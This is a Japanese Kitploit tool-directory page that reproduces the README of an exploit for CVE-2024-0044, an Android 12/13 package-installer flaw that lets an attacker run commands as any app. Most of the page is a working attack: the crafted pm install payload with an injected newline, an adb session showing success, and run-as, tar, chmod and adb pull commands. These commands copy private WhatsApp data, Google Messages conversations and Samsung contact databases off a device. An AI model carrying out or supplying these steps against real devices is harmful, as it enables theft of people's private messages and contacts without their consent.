Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve_2024_0044 — CVE-2024-0044: 「任意のアプリとして実行」の高深刻度脆弱性、Android バージョン12および13に影響 | Kitploit
ツール/GitHubGitHub/k4ran909/cve_2024_0044
Androidセキュリティ特権昇格脆弱性分析エクスプロイトデータ流出ポストエクスプロイトペネトレーションテストモバイルセキュリティ
GitHubk4ran909/cve_2024_0044

cve_2024_0044

CVE-2024-0044: 「任意のアプリとして実行」の高深刻度脆弱性、Android バージョン12および13に影響

リポジトリを見る
471年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE 2024 0044

CVE-2024-0044は、PackageInstallerService.javaファイルのcreateSessionInternal関数で特定された、Androidバージョン12および13に影響する高深刻度の脆弱性です。この脆弱性により、攻撃者は「任意のアプリとして実行」攻撃を行い、ユーザーの操作を必要とせずにローカルでの権限昇格を引き起こす可能性があります。この問題は、createSessionInternal関数内の不適切な入力検証に起因します。攻撃者はセッション作成処理を操作することでこれを悪用し、影響を受けるデバイス上の機密データへの不正アクセスや不正な操作を行う可能性があります。

このエクスプロイトはMeta securityによって発見されました。

概念実証はTiny hackによって要約され共有されました。

セキュリティパッチの詳細はAndroid セキュリティ情報で確認できます。

前提条件

  1. スマートフォンでUSBデバッグを有効にし、USBケーブルまたはワイヤレスデバッグを使用して端末に接続します。
  2. 任意のAPKを端末にダウンロードします。F-DROIDを使用できます。

ツールの使用方法

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-Pは、実行したいターゲットのパッケージ名を指定するために使用します。

-Aは、デバイスにプッシュするAPKファイルを指定するために使用します。

エクスプロイト

ツールを実行します。 python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

次のようなpayload.txtファイルが生成されます。

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

ツールは一部の処理を自動化しますが、他の部分は手動で行う必要があります。ペイロード生成後に終了して、すべてのコマンドを手動で実行することも、指示に従って続行することもできます。

次に、adb shellを使用してデバイスに接続し、ペイロードを貼り付けます。最後のコマンドの後にSuccessメッセージが返ってくることを確認してください。

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

次に、以下のコマンドを使用してWhatsAppデータを取得します。

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

一時ディレクトリを作成: mkdir /data/local/tmp/wa/

tarファイルのプレースホルダを作成: touch /data/local/tmp/wa/wa.tar

広範囲のパーミッションを設定: chmod -R 0777 /data/local/tmp/wa/ により、すべてのユーザーがこのディレクトリ内で読み取り、書き込み、実行できるようにします。

ユーザーコンテキストを切り替え: run-as victim により、「victim」ユーザーと同じ権限を取得します。

ターゲットアプリケーションのデータをアーカイブ: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp で、WhatsAppデータディレクトリのtarballを作成します。

最後にデータをプルします。

adb pull /data/local/tmp/wa/wa.tar

7z または他のツールを使用してデータを抽出できます。

Whatsapp chat exporter を使用してHTMLに変換することもできます。

これにより、デバイス上でroot権限がなくてもWhatsAppデータを取得できます。

Googleメッセージのプル

パッケージ名を次のように変更するだけです。

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Down
loads/F-Droid.apk

上記の手順に従い、wa.tarファイルをプルした後、それを展開し、com.google.android.apps.messaging/databases/bugle_db内の会話をsqlitebrowserなどのツールで開きます。

連絡先のプル

Samsungデバイスでテスト済みです。他のデバイスの場合は、連絡先プロバイダのパッケージ名を確認してください。

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.samsung.android.app.contacts -A ~/Downloads/F-Droid.apk

上記の手順に従い、wa.tarファイルをプルした後、それを展開し、com.samsung.android.providers.contacts/databases/contacts2.db内の連絡先をsqlitebrowserなどのツールで開きます。このDBファイルには、すべてのユーザーのメールアカウント情報と連絡先リストが含まれています。

ツールをダウンロード